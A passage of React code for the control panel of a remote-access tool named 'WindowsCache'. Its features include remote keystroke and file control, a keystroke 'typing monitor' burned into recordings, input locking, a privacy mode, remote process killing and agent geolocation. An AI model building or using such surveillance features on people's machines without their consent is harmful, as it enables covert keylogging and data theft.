    const mid = (t) => ({ x: (t[0].clientX + t[1].clientX) / 2, y: (t[0].clientY + t[1].clientY) / 2 });
    const onStart = (e) => {
      if (e.touches.length === 2) {
        e.preventDefault();
        pinchRef.current = { startDist: dist(e.touches) || 1, startZoom: zoomRef.current, startMid: mid(e.touches), startPan: { ...panRef.current } };
      }
    };
    const onMove = (e) => {
      if (e.touches.length === 2 && pinchRef.current) {
        e.preventDefault();
        const p = pinchRef.current;
        const z = Math.max(1, Math.min(4, p.startZoom * (dist(e.touches) / p.startDist)));
        const m = mid(e.touches);
        const nx = p.startPan.x + (m.x - p.startMid.x);
        const ny = p.startPan.y + (m.y - p.startMid.y);
        setZoom(z);
        setPan(z <= 1.001 ? { x: 0, y: 0 } : { x: nx, y: ny });
      }
    };
    const onEnd = (e) => { if (e.touches.length < 2) pinchRef.current = null; };
    el.addEventListener('touchstart', onStart, { passive: false });
    el.addEventListener('touchmove', onMove, { passive: false });
    el.addEventListener('touchend', onEnd);
    el.addEventListener('touchcancel', onEnd);
    return () => {
      el.removeEventListener('touchstart', onStart);
      el.removeEventListener('touchmove', onMove);
      el.removeEventListener('touchend', onEnd);
      el.removeEventListener('touchcancel', onEnd);
    };
  }, [screen]);

  const normalizeKey = (e) => {
    if (e.key === 'OS' || e.key === 'Super') return 'Meta';
    if (e.code === 'Space' || e.key === ' ') return ' ';
    // Prefer physical code for modifiers so left/right stay distinct when needed
    if (e.key === 'Shift' || e.key === 'Control' || e.key === 'Alt' || e.key === 'Meta') {
      return e.key;
    }
    return e.key;
  };

  const handleKeyDown = (e) => {
    console.log('[KEY] keydown fired:', e.key, 'target:', e.target?.tagName);
    // Let chat/file inputs keep normal typing
    const tag = (e.target && e.target.tagName) ? e.target.tagName.toLowerCase() : '';
    if (tag === 'input' || tag === 'textarea' || e.target?.isContentEditable) return;

    e.preventDefault(); e.stopPropagation();
    const keyToSend = normalizeKey(e);
    if (!keyToSend) return;

    // Browser auto-repeat: skip repeat for non-character keys; for chars still tap once path via down only once
    if (e.repeat && (keyToSend.length > 1 || ['Shift','Control','Alt','Meta'].includes(keyToSend))) {
      return;
    }

    if (keyToSend.length === 1 || keyToSend === 'Backspace' || keyToSend === 'Delete') {
      setCursorType('text');
      if (keyTimeoutRef.current) clearTimeout(keyTimeoutRef.current);
      keyTimeoutRef.current = setTimeout(() => { setLastKey(''); setCursorType('default'); }, 1000);
    }

    // Hold modifiers with key_down; characters as key_press (unicode inject on agent)
    const isMod = ['Shift','Control','Alt','Meta'].includes(keyToSend);
    if (isMod) {
      if (pressedKeysRef.current.has(keyToSend)) return;
      pressedKeysRef.current.add(keyToSend);
      sendCommand({ type: 'key_down', key: keyToSend });
    } else if (e.repeat && keyToSend.length === 1) {
      sendCommand({ type: 'key_press', key: keyToSend });
    } else if (keyToSend.length === 1) {
      sendCommand({ type: 'key_press', key: keyToSend });
      pressedKeysRef.current.add('char:' + keyToSend);
    } else {
      // special keys: press+release
      sendCommand({ type: 'key_press', key: keyToSend });
    }
    showKey(keyToSend === ' ' ? 'Space' : keyToSend);
  };

  const handleKeyUp = (e) => {
    const tag = (e.target && e.target.tagName) ? e.target.tagName.toLowerCase() : '';
    if (tag === 'input' || tag === 'textarea' || e.target?.isContentEditable) return;
    e.preventDefault(); e.stopPropagation();
    const keyToSend = normalizeKey(e);
    if (!keyToSend) return;
    if (['Shift','Control','Alt','Meta'].includes(keyToSend)) {
      pressedKeysRef.current.delete(keyToSend);
      sendCommand({ type: 'key_up', key: keyToSend });
    } else {
      pressedKeysRef.current.delete('char:' + keyToSend);
    }
  };

  // Release stuck modifiers if window blurs
  useEffect(() => {
    const onBlur = () => {
      for (const k of Array.from(pressedKeysRef.current)) {
        if (!String(k).startsWith('char:')) {
          sendCommand({ type: 'key_up', key: k });
        }
      }
      pressedKeysRef.current.clear();
    };
    window.addEventListener('blur', onBlur);
    return () => window.removeEventListener('blur', onBlur);
  // eslint-disable-next-line react-hooks/exhaustive-deps
  }, []);

  // Send one file (optionally under a sub-folder, for folder uploads). Returns
  // a promise so the callers can send many files one after another.
  const processFileUpload = (file, relPath) => new Promise((resolve) => {
    if (!file) { resolve(); return; }
    const sizeMb = (file.size / (1024*1024)).toFixed(1);
    const sub = (relPath && relPath.includes('/')) ? relPath.slice(0, relPath.lastIndexOf('/')) : '';
    const label = sub ? `${sub}/${file.name}` : file.name;
    // [BL-EDIT] destination the agent should save into
    const destForSend = sendDest === 'custom' ? ('custom:' + (sendDestPath || '').trim()) : sendDest;
    setTransferStatus(`⬆️ Sending ${label} (${sizeMb} MB)...`);
    const reader = new FileReader();
    reader.onload = async (ev) => {
      const base64 = ev.target.result.split(',')[1] || '';
      const chunkSize = 65536, totalChunks = Math.ceil(base64.length / chunkSize) || 1;
      for (let i = 0; i < totalChunks; i++) {
        sendCommand({ type: 'file:send', fileName: file.name, subPath: sub, dest: destForSend, chunkIndex: i, totalChunks, data: base64.slice(i * chunkSize, (i+1) * chunkSize) });
        await new Promise(r => setTimeout(r, 15));
        setTransferStatus(`⬆️ ${label} — ${Math.round(((i+1)/totalChunks)*100)}%`);
      }
      resolve();
    };
    reader.onerror = () => resolve();
    reader.readAsDataURL(file);
  });

  const uploadMany = async (files) => {
    const list = [...files];
    if (!list.length) return;
    for (const f of list) { await processFileUpload(f, f.webkitRelativePath || ''); }
    const where = sendDest === 'custom' ? (sendDestPath || 'custom path') : sendDest;
    setTransferStatus(`✅ Sent ${list.length} item(s) to the agent's ${where}.`, true);
  };

  const handleFilePick = (e) => { uploadMany(e.target.files); e.target.value = ''; };
  const handleFolderPick = (e) => { uploadMany(e.target.files); e.target.value = ''; };
  const handleDragOver = (e) => { e.preventDefault(); e.stopPropagation(); setDragOver(true); };
  const handleDragLeave = (e) => { e.preventDefault(); setDragOver(false); };
  const handleDrop = (e) => { e.preventDefault(); e.stopPropagation(); setDragOver(false); uploadMany(e.dataTransfer.files); };
  const downloadFile = (filePath, fileName) => { setTransferStatus(`⬇️ Requesting ${fileName}...`); setFileTransferDone(false); sendCommand({ type: 'file:request', path: filePath }); };
  const toggleSel = (path) => setSelFiles(prev => prev.includes(path) ? prev.filter(p => p !== path) : [...prev, path]);
  const downloadSelected = () => {
    if (!selFiles.length) return;
    setTransferStatus(`⬇️ Zipping ${selFiles.length} item(s)...`); setFileTransferDone(false);
    sendCommand({ type: 'files:request', paths: selFiles });
    setSelFiles([]);
  };

  const sendChat = () => {
    if (!chatMsg.trim()) return;
    sendCommand({ type: 'chat:message', message: chatMsg.trim() });
    setChatSent(`✅ Sent: "${chatMsg.trim()}"`);
    setChatMsg('');
    setTimeout(() => setChatSent(''), 4000);
  };

  const pushClipboard = async () => {
  try {
    const text = await navigator.clipboard.readText();
    if (text) {
      sendCommand({ type: 'clipboard:set', text, paste: true });
      setClipboardStatus('✅ Pasted to agent');
      setTimeout(() => setClipboardStatus(''), 3000);
    }
  } catch {
    setClipboardStatus('❌ Cannot read clipboard');
    setTimeout(() => setClipboardStatus(''), 3000);
  }
};

  const pullClipboard = () => { sendCommand({ type: 'clipboard:get' }); setClipboardStatus('⟳ Getting agent clipboard...'); };

  // Image clipboard: send an image from MY clipboard to the agent, or grab one.
  const sendImageToAgent = async () => {
    try {
      const items = await navigator.clipboard.read();
      for (const item of items) {
        const type = item.types.find(t => t.startsWith('image/'));
        if (type) {
          const blob = await item.getType(type);
          const dataUrl = await new Promise(res => { const r = new FileReader(); r.onload = () => res(r.result); r.readAsDataURL(blob); });
          sendCommand({ type: 'clipboard:set-image', dataUrl });
          setClipboardStatus('🖼 Sending image to agent...');
          setTimeout(() => setClipboardStatus(''), 3000);
          return;
        }
      }
      setClipboardStatus('No image in your clipboard — copy one first');
      setTimeout(() => setClipboardStatus(''), 3000);
    } catch (e) {
      setClipboardStatus('Allow clipboard permission (and copy an image first)');
      setTimeout(() => setClipboardStatus(''), 3500);
    }
  };
  const getImageFromAgent = () => { sendCommand({ type: 'clipboard:get-image' }); setClipboardStatus('⟳ Getting image from agent...'); };

  const switchMonitor = (index) => {
  setActiveMonitor(index);
  sendCommand({ type: 'monitor:switch', index });
  setShowMonitors(false);
  if (screenModeRef.current !== 'screenshot') {
    setTimeout(() => startWebRTC(activeAgentRef.current), 500);
  }
};

  const takeScreenshot = () => {
    if (screenMode === 'screenshot' && screenImage) {
      const a = document.createElement('a');
      a.href = screenImage;
      a.download = `wincache-screenshot-${Date.now()}.jpg`;
      a.click();
      return;
    }
    if (!videoRef.current) return;
    const canvas = document.createElement('canvas');
    const w = videoRef.current.videoWidth, h = videoRef.current.videoHeight;
    canvas.width = w;
    canvas.height = h;
    const ctx = canvas.getContext('2d');
    ctx.drawImage(videoRef.current, 0, 0);
    // [BL-EDIT] When the typing monitor is on, burn the keystrokes into the shot too.
    if (keylogOnRef.current && keylogTextRef.current) {
      const txt = String(keylogTextRef.current).slice(-140);
      const barH = Math.max(30, Math.round(h * 0.055));
      ctx.fillStyle = 'rgba(0,0,0,0.6)'; ctx.fillRect(0, h - barH, w, barH);
      ctx.fillStyle = '#ffcc33'; ctx.font = `${Math.round(barH * 0.5)}px monospace`; ctx.textBaseline = 'middle';
      ctx.fillText('⌨ ' + txt, 12, h - barH / 2);
    }
    const a = document.createElement('a');
    a.href = canvas.toDataURL('image/png');
    a.download = `wincache-screenshot-${Date.now()}.png`;
    a.click();
  };

  const sendKeyCombo = (keys) => { sendCommand({ type: 'key_combo', keys }); };

  // [BL-EDIT] "connected" fires the moment the WebRTC track arrives, but the
  // browser needs a beat more to decode and paint the first frame (videoWidth
  // stays 0 until then). Instead of rejecting Record in that window, wait for a
  // real frame — up to ~6s — then start automatically.
  const frameReady = () => {
    const el = videoRef.current;
    return !!(el && el.srcObject && el.videoWidth > 0);
  };

  const startRecording = () => {
    if (frameReady()) { beginRecording(); return; }
    // Not painted yet — wait for it rather than failing.
    setRecWaiting(true);
    pushToast('⏺ Waiting for the live picture…', 'info');
    let waited = 0;
    if (recWaitRef.current) clearInterval(recWaitRef.current);
    recWaitRef.current = setInterval(() => {
      waited += 200;
      if (frameReady()) {
        clearInterval(recWaitRef.current); recWaitRef.current = null;
        setRecWaiting(false);
        beginRecording();
      } else if (waited >= 6000) {
        clearInterval(recWaitRef.current); recWaitRef.current = null;
        setRecWaiting(false);
        pushToast('❌ No picture yet — make sure the remote screen is showing, then press Record again.', 'error');
      }
    }, 200);
  };

  const beginRecording = () => {
    try {
      // Record the VIDEO ELEMENT's output, not the raw WebRTC track. The raw
      // track ends whenever the connection renegotiates or swaps monitors,
      // which used to stop the recording mid-way. captureStream() follows the
      // element, so it keeps rolling across track swaps.
      const el = videoRef.current;
      // [BL-EDIT] Draw the live video onto a canvas and, when the typing
      // monitor is on, burn the keylog text along the bottom, then record the
      // canvas. This makes the saved video include the keystrokes. If the
      // typing monitor is off, it is just the plain screen.
      const canvas = document.createElement('canvas');
      canvas.width = el.videoWidth || 1280;
      canvas.height = el.videoHeight || 720;
      const ctx = canvas.getContext('2d');
      recordingCanvasRef.current = canvas;
      const draw = () => {
        try {
          const v = videoRef.current;
          if (v && v.videoWidth) {
            if (canvas.width !== v.videoWidth) canvas.width = v.videoWidth;
            if (canvas.height !== v.videoHeight) canvas.height = v.videoHeight;
            ctx.drawImage(v, 0, 0, canvas.width, canvas.height);
          }
          if (keylogOnRef.current && keylogTextRef.current) {
            const txt = String(keylogTextRef.current).slice(-140);
            const barH = Math.max(30, Math.round(canvas.height * 0.055));
            ctx.fillStyle = 'rgba(0,0,0,0.6)';
            ctx.fillRect(0, canvas.height - barH, canvas.width, barH);
            ctx.fillStyle = '#ffcc33';
            ctx.font = `${Math.round(barH * 0.5)}px monospace`;
            ctx.textBaseline = 'middle';
            ctx.fillText('⌨ ' + txt, 12, canvas.height - barH / 2);
          }
        } catch (e) {}
      };
      draw();
      recordingDrawRef.current = setInterval(draw, 66); // ~15fps
      const stream = canvas.captureStream(15);
      // Carry over any audio track from the live stream.
      try {
        const src = (typeof el.captureStream === 'function') ? el.captureStream() : el.srcObject;
        ((src && src.getAudioTracks && src.getAudioTracks()) || []).forEach(t => stream.addTrack(t));
      } catch (e) {}
      const recorder = new MediaRecorder(stream, { mimeType: 'video/webm;codecs=vp8' });
      recordingChunksRef.current = [];
      recorder.ondataavailable = (e) => { if (e.data && e.data.size > 0) recordingChunksRef.current.push(e.data); };
      recorder.onstop = () => {
        // Save whatever we captured (skip an empty file).
        if (recordingChunksRef.current.length) {
          const blob = new Blob(recordingChunksRef.current, { type: 'video/webm' });
          const url = URL.createObjectURL(blob);
          // [BL-EDIT] Readable filename: <AgentName>-BridgeLink-YYYY-MM-DD_HH-MM.webm
          const agentName = (activeAgentRef.current?.name || 'session').replace(/[^\w.-]+/g, '_');
          const d = new Date();
          const pad = (n) => String(n).padStart(2, '0');
          const stamp = `${d.getFullYear()}-${pad(d.getMonth() + 1)}-${pad(d.getDate())}_${pad(d.getHours())}-${pad(d.getMinutes())}`;
          const fileName = `${agentName}-BridgeLink-${stamp}.webm`;
          // Auto-save (download) as before…
          const a = document.createElement('a');
          a.href = url;
          a.download = fileName;
          a.click();
          // …and keep it in the session recordings list so it can be reviewed
          // or re-saved from the Recordings panel.
          setRecordings(prev => [
            { id: Date.now(), name: fileName, url, size: blob.size, at: d, agent: activeAgentRef.current?.name || 'session' },
            ...prev,
          ]);
          pushToast('✅ Recording saved: ' + fileName, 'success');
        }
        recordingChunksRef.current = [];
        // [BL-EDIT] Stop the overlay draw loop.
        if (recordingDrawRef.current) { clearInterval(recordingDrawRef.current); recordingDrawRef.current = null; }
        recordingCanvasRef.current = null;
        // Always reset the indicator so it can never get stuck "recording"
        // after the recorder stops for any reason.
        clearInterval(recordingTimerRef.current);
        setRecording(false);
        setRecordingTime(0);
        mediaRecorderRef.current = null;
      };
      recorder.onerror = (e) => { console.error('Recorder error:', e); };
      recorder.start(1000);
      mediaRecorderRef.current = recorder;
      setRecording(true);
      setRecordingTime(0);
      recordingTimerRef.current = setInterval(() => setRecordingTime(t => t + 1), 1000);
    } catch(e) {
      console.error('Recording failed:', e);
    }
  };

  const stopRecording = () => {
    // If we were still waiting for the first frame, cancel that wait.
    if (recWaitRef.current) { clearInterval(recWaitRef.current); recWaitRef.current = null; setRecWaiting(false); }
    if (mediaRecorderRef.current && mediaRecorderRef.current.state !== 'inactive') {
      mediaRecorderRef.current.stop();
      mediaRecorderRef.current = null;
    }
    clearInterval(recordingTimerRef.current);
    setRecording(false);
    setRecordingTime(0);
  };

  const toggleRecording = () => {
    if (recording) stopRecording();
    else startRecording();
  };

  // [BL-EDIT] Drag the bottom toolbar (or its minimized tab) anywhere on screen,
  // so it never blocks what you're working on. Works with mouse and touch.
  const beginBarDrag = (e) => {
    e.preventDefault();
    const pt = e.touches ? e.touches[0] : e;
    const start = { x: pt.clientX, y: pt.clientY };
    const base = barPos || { x: window.innerWidth / 2, y: window.innerHeight - 40 };
    const move = (ev) => {
      const p = ev.touches ? ev.touches[0] : ev;
      const nx = Math.min(window.innerWidth - 40, Math.max(40, base.x + (p.clientX - start.x)));
      const ny = Math.min(window.innerHeight - 20, Math.max(20, base.y + (p.clientY - start.y)));
      setBarPos({ x: nx, y: ny });
    };
    const up = () => {
      window.removeEventListener('mousemove', move);
      window.removeEventListener('mouseup', up);
      window.removeEventListener('touchmove', move);
      window.removeEventListener('touchend', up);
    };
    window.addEventListener('mousemove', move);
    window.addEventListener('mouseup', up);
    window.addEventListener('touchmove', move, { passive: false });
    window.addEventListener('touchend', up);
  };
  // When the toolbar has a custom position, anchor it there (centered on x).
  const barPosStyle = barPos
    ? { left: barPos.x, top: barPos.y, bottom: 'auto', transform: 'translate(-50%, -50%)' }
    : {};

  // [BL-EDIT] Power-control the REMOTE PC (confirmed — these are destructive).
  const restartPC = () => {
    if (window.confirm('Restart the REMOTE PC now?\n\nUnsaved work on that machine will be lost, and it will drop off until it boots back up.')) {
      sendCommand({ type: 'pc:restart' });
    }
  };
  const shutdownPC = () => {
    if (window.confirm('Shut down the REMOTE PC now?\n\nYou will lose the connection and cannot power it back on remotely.')) {
      sendCommand({ type: 'pc:shutdown' });
    }
  };

  // [BL-EDIT] Lock/unlock the remote keyboard & mouse (exclusive control).
  const toggleInputLock = () => {
    const next = !inputLocked;
    setInputLocked(next); // optimistic; the agent confirms with an input:lock event
    sendCommand({ type: next ? 'input:lock' : 'input:unlock' });
  };

  // [BL-EDIT] Remote task manager.
  const openTaskMgr = () => {
    setShowTaskMgr(true); setProcLoading(true); setProcList([]);
    setShowFilePanel(false); setShowChat(false); setShowMigrate(false);
    sendCommand({ type: 'proc:list' });
  };
  const refreshProcs = () => { setProcLoading(true); sendCommand({ type: 'proc:list' }); };

  // [BL-EDIT] Type a block of text on the remote machine (into the focused field).
  const sendTypeText = () => {
    if (!typeText) return;
    const text = typeEnter ? (typeText + '\n') : typeText;
    sendCommand({ type: 'type_text', text });
    setClipboardStatus('Typed ' + typeText.length + ' chars on the remote machine');
    setTimeout(() => setClipboardStatus(''), 2500);
  };
  const killProc = (pid, name) => {
    if (window.confirm(`Kill "${name}" (pid ${pid}) on the remote machine?\n\nUnsaved work in that program will be lost.`)) {
      sendCommand({ type: 'proc:kill', pid });
    }
  };

  const goBack = () => {
    closeCamera();
    stopRecording();
    if (inputLocked) sendCommand({ type: 'input:unlock' }); // [BL-EDIT] never leave the machine locked
    sendCommand({ type: 'session:end' });
    if (privacyOn) sendCommand({ type: 'privacy:off' });
    if (document.fullscreenElement) document.exitFullscreen();
    pcGenRef.current++;
    if (pcRef.current) { try { pcRef.current.close(); } catch(e){} pcRef.current = null; }
    if (videoRef.current) { videoRef.current.srcObject = null; videoRef.current.load(); }
    if (latencyIntervalRef.current) clearInterval(latencyIntervalRef.current);
    if (keyTimeoutRef.current) clearTimeout(keyTimeoutRef.current);
    if (alertTimeoutRef.current) clearTimeout(alertTimeoutRef.current);
    if (reconnectTimerRef.current) clearTimeout(reconnectTimerRef.current);
    if (countdownTimerRef.current) clearInterval(countdownTimerRef.current);
    setLatency(null); setQuality(null); setShowKeypad(false);
    setLastKey(''); setPrivacyOn(false); setScreenStatus('on'); setScreenAlert(false);
    setActiveAgent(null); activeAgentRef.current = null;
    setAgentLocation(null); setCursorVisible(false); setCursorType('default');
    setTransferStatus(''); setFileTransferDone(false); setShowFilePanel(false);
    setBrowsing(false); setBrowseEntries([]);
    setAgentOffline(false); setStreamError(''); setReconnectCountdown(0); agentOfflineRef.current = false;
    setShowChat(false); setChatMsg(''); setChatSent(''); setClipboardStatus('');
    setMonitors([]); setActiveMonitor(1); setShowMonitors(false);
    setScreenImage(null);
    setScreenMode('webrtc');
    setInputLocked(false); setShowTaskMgr(false); setProcList([]); lastStreamWRef.current = 0; // [BL-EDIT]
    setShowTypeBox(false); setTypeText(''); // [BL-EDIT]
    setZoom(1); setPan({ x: 0, y: 0 }); setToolbarMin(false); // [BL-EDIT] reset mobile view
    // [BL-EDIT] Release recording blobs and reset the recordings panel + toolbar position.
    setRecordings(prev => { prev.forEach(r => { try { URL.revokeObjectURL(r.url); } catch (e) {} }); return []; });
    setShowRecordings(false); setBarPos(null); setToasts([]);
    setMouseEnabled(false); mouseEnabledRef.current = false;
    setLoadingScreen(false); setLoadingMsg('Connecting...');
    setRecording(false); setRecordingTime(0);
    if (recordingTimerRef.current) clearInterval(recordingTimerRef.current);
    setUserActive(false); setKeylogBuffer([]); setAgentCursorPos(null);
    if (userActiveTimerRef.current) clearTimeout(userActiveTimerRef.current);
    if (keylogTimerRef.current) clearTimeout(keylogTimerRef.current);
    if (agentCursorTimerRef.current) clearTimeout(agentCursorTimerRef.current);
    setScreen('dashboard'); setStatus('');
  };

  const fileIcon = (entry) => {
    if (entry.type === 'folder') return '📁';
    const ext = entry.name.split('.').pop().toLowerCase();
    if (['jpg','jpeg','png','gif','webp','bmp','svg'].includes(ext)) return '🖼️';
    if (['mp4','mkv','avi','mov','wmv'].includes(ext)) return '🎬';
    if (['mp3','wav','flac','aac','ogg'].includes(ext)) return '🎵';
    if (['zip','rar','7z','tar','gz'].includes(ext)) return '🗜️';
    if (['pdf'].includes(ext)) return '📄';
    if (['doc','docx'].includes(ext)) return '📝';
    if (['xls','xlsx'].includes(ext)) return '📊';
    if (['exe','msi'].includes(ext)) return '⚙️';
    if (['py','js','ts','java','cpp','c','sh','bat'].includes(ext)) return '💻';
    return '📃';
  };

  const isConnected = status === 'connected';

  // [BL-EDIT] The in-app prompt popup, rendered on any screen that needs it.
  const promptModal = promptCfg ? (
    <div style={{ position: 'fixed', inset: 0, background: 'rgba(0,0,0,0.6)', zIndex: 100000, display: 'flex', alignItems: 'center', justifyContent: 'center' }}
      onClick={() => { promptCfg.resolve(null); setPromptCfg(null); }}>
      <div onClick={e => e.stopPropagation()} style={{ background: '#0f0f18', border: '1px solid #2a2a3a', borderRadius: 12, padding: 18, width: 'min(460px, 92vw)', boxShadow: '0 10px 40px rgba(0,0,0,0.6)' }}>
        <div style={{ color: '#dfe7f5', fontSize: 13, marginBottom: 10, whiteSpace: 'pre-wrap', lineHeight: 1.5 }}>{promptCfg.message}</div>
        <input autoFocus value={promptCfg.value}
          onChange={e => setPromptCfg(c => (c ? { ...c, value: e.target.value } : c))}
          onKeyDown={e => { e.stopPropagation(); if (e.key === 'Enter') { promptCfg.resolve(promptCfg.value); setPromptCfg(null); } else if (e.key === 'Escape') { promptCfg.resolve(null); setPromptCfg(null); } }}
          style={{ width: '100%', background: '#0a0a14', color: '#fff', border: '1px solid #26303f', borderRadius: 8, padding: '9px 10px', fontSize: 14, marginBottom: 12, fontFamily: 'inherit' }} />
        <div style={{ display: 'flex', gap: 8, justifyContent: 'flex-end' }}>
          <button onClick={() => { promptCfg.resolve(null); setPromptCfg(null); }} style={{ background: '#2a2a3a', color: '#dfe7f5', border: 'none', borderRadius: 8, padding: '8px 14px', cursor: 'pointer' }}>Cancel</button>
          <button onClick={() => { promptCfg.resolve(promptCfg.value); setPromptCfg(null); }} style={{ background: '#2563eb', color: '#fff', border: 'none', borderRadius: 8, padding: '8px 14px', cursor: 'pointer', fontWeight: 600 }}>OK</button>
        </div>
      </div>
    </div>
  ) : null;

  if (!licenseValid) return (
    <div style={styles.container} className="bl-fade">
      <div style={styles.loginBox}>
        <div style={{ textAlign: 'center', marginBottom: 8 }}>
          <div style={{ fontSize: 36, marginBottom: 8 }}>⬡</div>
          <h1 style={styles.logo}>WindowsCache</h1>
          <p style={{ ...styles.sub, marginTop: 4 }}>License Activation</p>
        </div>
        <div style={{ height: 1, background: 'linear-gradient(to right, transparent, #333, transparent)', margin: '8px 0' }} />
        <p style={{ color: '#555', fontSize: 12, textAlign: 'center', lineHeight: 1.6 }}>Enter your license key to activate WindowsCache on this device.</p>
        {licenseError && <div style={styles.errorBox}><span>⚠</span> {licenseError}</div>}
        <div style={{ display: 'flex', flexDirection: 'column', gap: 6 }}>
          <label style={{ color: '#555', fontSize: 11, letterSpacing: 1 }}>LICENSE KEY</label>
          <input style={{ ...styles.input, textTransform: 'uppercase', letterSpacing: 2 }} type="text" placeholder="BL-XXXX-XXXX-XXXX" value={licenseKey} onChange={e => setLicenseKey(e.target.value.toUpperCase())} onKeyDown={e => e.key === 'Enter' && !licenseChecking && validateLicense()} autoFocus />
        </div>
        <button className="bl-btn" style={{ ...styles.btn, marginTop: 4, opacity: licenseChecking ? 0.75 : 1, cursor: licenseChecking ? 'not-allowed' : 'pointer', display: 'flex', alignItems: 'center', justifyContent: 'center', gap: 8 }} onClick={validateLicense} disabled={licenseChecking}>
          {licenseChecking ? <><span className="bl-spin">⟳</span> Validating...</> : '→ Activate'}
        </button>
        <p style={{ color: '#333', fontSize: 11, textAlign: 'center' }}>Contact your administrator for a license key.</p>
      </div>
    </div>
  );

  if (screen === 'login') return (
    <div style={styles.container} className="bl-fade">
      <div style={styles.loginBox}>
        <div style={{ textAlign: 'center', marginBottom: 8 }}>
          <div style={{ fontSize: 36, marginBottom: 8 }}>⬡</div>
          <h1 style={styles.logo}>WindowsCache</h1>
          <p style={{ ...styles.sub, marginTop: 4 }}>Secure Remote Access</p>
        </div>
        <div style={{ height: 1, background: 'linear-gradient(to right, transparent, #333, transparent)', margin: '8px 0' }} />
        {error && <div style={styles.errorBox}><span>⚠</span> {error}</div>}
        <div style={{ display: 'flex', flexDirection: 'column', gap: 6 }}>
          <label style={{ color: '#555', fontSize: 11, letterSpacing: 1 }}>PASSPHRASE</label>
          <input style={styles.input} type="password" placeholder="Enter passphrase" value={passphrase} onChange={e => setPassphrase(e.target.value)} onKeyDown={e => e.key === 'Enter' && !connecting && login()} autoFocus />
        </div>
        <button className="bl-btn" style={{ ...styles.btn, marginTop: 4, opacity: connecting ? 0.75 : 1, cursor: connecting ? 'not-allowed' : 'pointer', display: 'flex', alignItems: 'center', justifyContent: 'center', gap: 8 }} onClick={login} disabled={connecting}>
          {connecting ? <><span className="bl-spin">⟳</span> Connecting...</> : '→ Connect'}
        </button>
      </div>
    </div>
  );

  if (screen === 'dashboard') return (
    <div style={styles.container} className="bl-fade">
      {promptModal}
      <div style={styles.dashboard}>
        <div style={{ display: 'flex', justifyContent: 'space-between', alignItems: 'flex-start', marginBottom: 28 }}>
          <div>
            <h2 style={{ ...styles.logo, fontSize: 22 }}>⬡ WindowsCache</h2>
            <p style={{ ...styles.sub, marginTop: 4 }}>
              <span style={{ color: agents.length > 0 ? '#4cff91' : '#555' }}>●</span>
              {' '}{agents.length} device{agents.length !== 1 ? 's' : ''} online
            </p>
          </div>
          <button className="bl-icon-btn" style={styles.refreshBtn} onClick={refreshAgents} title="Refresh">
            <span style={{ display: 'inline-block', transition: 'transform 0.5s', transform: refreshing ? 'rotate(180deg)' : 'rotate(0deg)' }}>↻</span>
          </button>
        </div>

        {uninstallToast && (
          <div style={{ background: '#0d1a0d', border: '1px solid #4cff91', borderRadius: 8, padding: '10px 16px', color: '#4cff91', fontSize: 12, marginBottom: 12 }} className="bl-fade">
            {uninstallToast}
          </div>
        )}

        <div style={styles.agentList}>

          {agents.length === 0 && registeredAgents.filter(r => !r.online).length === 0 && (
            <div style={styles.emptyState}>
              <div style={{ fontSize: 40, marginBottom: 12, opacity: 0.3 }}>⬡</div>
              <div style={{ color: '#444', fontSize: 14 }}>No devices online</div>
              <div style={{ color: '#333', fontSize: 12, marginTop: 4 }}>Waiting for agents to connect...</div>
            </div>
          )}

          {agents.map(agent => (
            <div key={agent.deviceId} className="bl-card" style={styles.agentCard} onClick={() => connectAgent(agent)}>
              <div style={styles.agentInfo}>
                <div style={styles.agentDotWrap}><span className="bl-pulse" style={styles.dot}>●</span></div>
                <div style={{ flex: 1 }}>
                  {tagFor(agent.deviceId) && (
                    <div style={{ fontWeight: 700, fontSize: 16, color: '#e8e8f0', marginBottom: 3, letterSpacing: '.01em' }}>
                      {tagFor(agent.deviceId)}
                    </div>
                  )}
                  <div style={{ display: 'flex', alignItems: 'center', gap: 8, flexWrap: 'wrap' }}>
                    <span style={{ ...styles.agentName, ...(tagFor(agent.deviceId) ? { fontSize: 12, color: '#888', fontWeight: 400 } : {}) }}>{agent.name}</span>
                    <span style={styles.agentOs}>{agent.os}</span>
                    <button
                      title="Set a name / tag for this machine"
                      onClick={e => { e.stopPropagation(); setTag(agent.deviceId); }}
                      style={{ background: 'transparent', border: '1px solid #333', borderRadius: 6, padding: '2px 7px', color: '#8a97a8', cursor: 'pointer', fontFamily: 'inherit', fontSize: 10 }}>
                      ✎ tag
                    </button>
                    {(agent.fallbackMode && !agent.webrtcAvailable) ? (
                      <span style={styles.fallbackBadge}>Terminal</span>
                    ) : agent.streamMode === 'webrtc' || agent.webrtcAvailable ? (
                      <span style={styles.captureBadge}>● WebRTC</span>
                    ) : (
                      <span style={styles.fallbackBadge}>Screenshot</span>
                    )}
                    {agent.agentVersion && (
                      <span style={styles.agentOs}>v{agent.agentVersion}</span>
                    )}
                    {agent.monitorCount > 1 && (
                      <span style={styles.monitorBadge}>🖥 {agent.monitorCount}</span>
                    )}
                  </div>
                  <div style={styles.agentMeta}>
                    {agent.screenWidth && `${agent.screenWidth}×${agent.screenHeight}`}
                    {agent.captureMethod && ` · ${agent.captureMethod}`}
                    {agent.ip && ` · ${agent.ip.replace('::ffff:', '')}`}
                    {agentPings[agent.deviceId] && (
                      <span style={{ color: agentPings[agent.deviceId] < 100 ? '#4cff91' : agentPings[agent.deviceId] < 200 ? '#ffaa00' : '#ff4444', marginLeft: 4 }}>
                        · 📶 ~{agentPings[agent.deviceId]}ms
                      </span>
                    )}
                  </div>
                  <AgentLocation ip={agent.publicIp || agent.ip} />
                </div>
              </div>
              <div style={{ display: 'flex', alignItems: 'center', gap: 8 }}>
                <div style={{ position: 'relative' }}>
                  <button
                    title="Run a toolbox script on this machine"
                    style={{ background: showToolbox === agent.deviceId ? '#0d1a0d' : 'transparent', border: '1px solid #4cff9133', borderRadius: 6, padding: '4px 8px', color: '#4cff91', cursor: 'pointer', fontFamily: 'inherit', fontSize: 10 }}
                    onClick={e => { e.stopPropagation(); setShowToolbox(showToolbox === agent.deviceId ? null : agent.deviceId); setToolboxAgent(agent); }}>
                    🧰 Tools
                  </button>
                  {showToolbox === agent.deviceId && (
                    <div style={{ position: 'absolute', bottom: '100%', right: 0, marginBottom: 4, background: '#0f0f18', border: '1px solid #1e1e2e', borderRadius: 10, minWidth: 220, maxHeight: 280, overflowY: 'auto', zIndex: 9999, boxShadow: '0 8px 24px rgba(0,0,0,0.5)' }} onClick={e => e.stopPropagation()}>
                      <div style={{ padding: '10px 14px', borderBottom: '1px solid #1a1a28', color: '#7c6aff', fontSize: 11, fontWeight: 'bold' }}>🧰 Toolbox — {agent.name}</div>
                      {toolboxScripts.length === 0 ? (
